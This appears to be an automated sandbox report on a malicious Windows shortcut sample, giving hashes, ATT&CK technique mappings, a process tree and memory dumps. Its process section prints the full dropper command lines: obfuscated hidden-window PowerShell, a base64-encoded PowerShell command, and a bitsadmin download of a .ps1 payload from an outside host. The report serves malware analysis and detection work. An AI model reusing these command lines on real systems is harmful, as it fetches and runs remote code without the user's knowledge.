7a8c0421b30ede4d8c087a4273a1b2a707c118a5e7db97dfc9d04c0d9dc45791

General

Target

693af6c78d4d741fbd604f78c4d4dfcd_JaffaCakes118.lnk
Size

2KB
MD5

693af6c78d4d741fbd604f78c4d4dfcd
SHA1

1369a8ec12f788b9df487e7500efcdb1aa18bb54
SHA256

7a8c0421b30ede4d8c087a4273a1b2a707c118a5e7db97dfc9d04c0d9dc45791
SHA512

acb95368819667942c435e968f930a274f3ce06b39a917c747360387c4259c71072b8f1ae2adafda32277658da84465f91c1befd493d8e4576ba6d35c229ed30

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2420 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

2624 bitsadmin.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2540 powershell.exe
2420 powershell.exe
2540 powershell.exe
2540 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2540 powershell.exe
Token: SeDebugPrivilege 2420 powershell.exe

pid	process
2420	powershell.exe

pid	process
2624	bitsadmin.exe

pid	process
2540	powershell.exe
2420	powershell.exe
2540	powershell.exe
2540	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.exepowershell.exepowershell.execmd.exe

description	pid	process	target process
PID 2220 wrote to memory of 2540	2220	cmd.exe	powershell.exe
PID 2220 wrote to memory of 2540	2220	cmd.exe	powershell.exe
PID 2220 wrote to memory of 2540	2220	cmd.exe	powershell.exe
PID 2540 wrote to memory of 2420	2540	powershell.exe	powershell.exe
PID 2540 wrote to memory of 2420	2540	powershell.exe	powershell.exe
PID 2540 wrote to memory of 2420	2540	powershell.exe	powershell.exe
PID 2420 wrote to memory of 2500	2420	powershell.exe	findstr.exe
PID 2420 wrote to memory of 2500	2420	powershell.exe	findstr.exe
PID 2420 wrote to memory of 2500	2420	powershell.exe	findstr.exe
PID 2540 wrote to memory of 1032	2540	powershell.exe	cmd.exe
PID 2540 wrote to memory of 1032	2540	powershell.exe	cmd.exe
PID 2540 wrote to memory of 1032	2540	powershell.exe	cmd.exe
PID 1032 wrote to memory of 2624	1032	cmd.exe	bitsadmin.exe
PID 1032 wrote to memory of 2624	1032	cmd.exe	bitsadmin.exe
PID 1032 wrote to memory of 2624	1032	cmd.exe	bitsadmin.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\693af6c78d4d741fbd604f78c4d4dfcd_JaffaCakes118.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -eP ByPass -nonI -c "&{$u='fingstr' -replace 'g','d'; $t='powershell -wi"N "hi"dDen -c { '+$u+' /s jerdolikab c:\users\*.lnk}'; $e=iex "$t"; "$e"|iex}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -wiN hidDen -encodedCommand IABmAGkAbgBkAHMAdAByACAALwBzACAAagBlAHIAZABvAGwAaQBrAGEAYgAgAGMAOgBcAHUAcwBlAHIAcwBcACoALgBsAG4AawA= -inputFormat xml -outputFormat xml
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2420

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /s jerdolikab c:\users\*.lnk
4⤵
PID:2500

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\d & bitsadmin /wrap /transfer jerdolikab /download /priority FOREGROUND "https://dkempton.com/kengur/arbojam" C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\CzOcILaXokMyJi.ps1 & del C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\d & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\system32\bitsadmin.exe
bitsadmin /wrap /transfer jerdolikab /download /priority FOREGROUND "https://dkempton.com/kengur/arbojam" C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\CzOcILaXokMyJi.ps1
4⤵
- Download via BitsAdmin
PID:2624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

BITS Jobs

1

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2420-50-0x0000000002AA0000-0x0000000002AD2000-memory.dmp

Filesize
200KB

Download
memory/2420-51-0x0000000002AA0000-0x0000000002AD2000-memory.dmp

Filesize
200KB

Download
memory/2540-43-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-38-0x000007FEF5FAE000-0x000007FEF5FAF000-memory.dmp

Filesize
4KB

Download
memory/2540-42-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-40-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/2540-44-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-45-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-41-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-39-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2540-53-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-54-0x000007FEF5FAE000-0x000007FEF5FAF000-memory.dmp

Filesize
4KB

Download
memory/2540-55-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2540-56-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing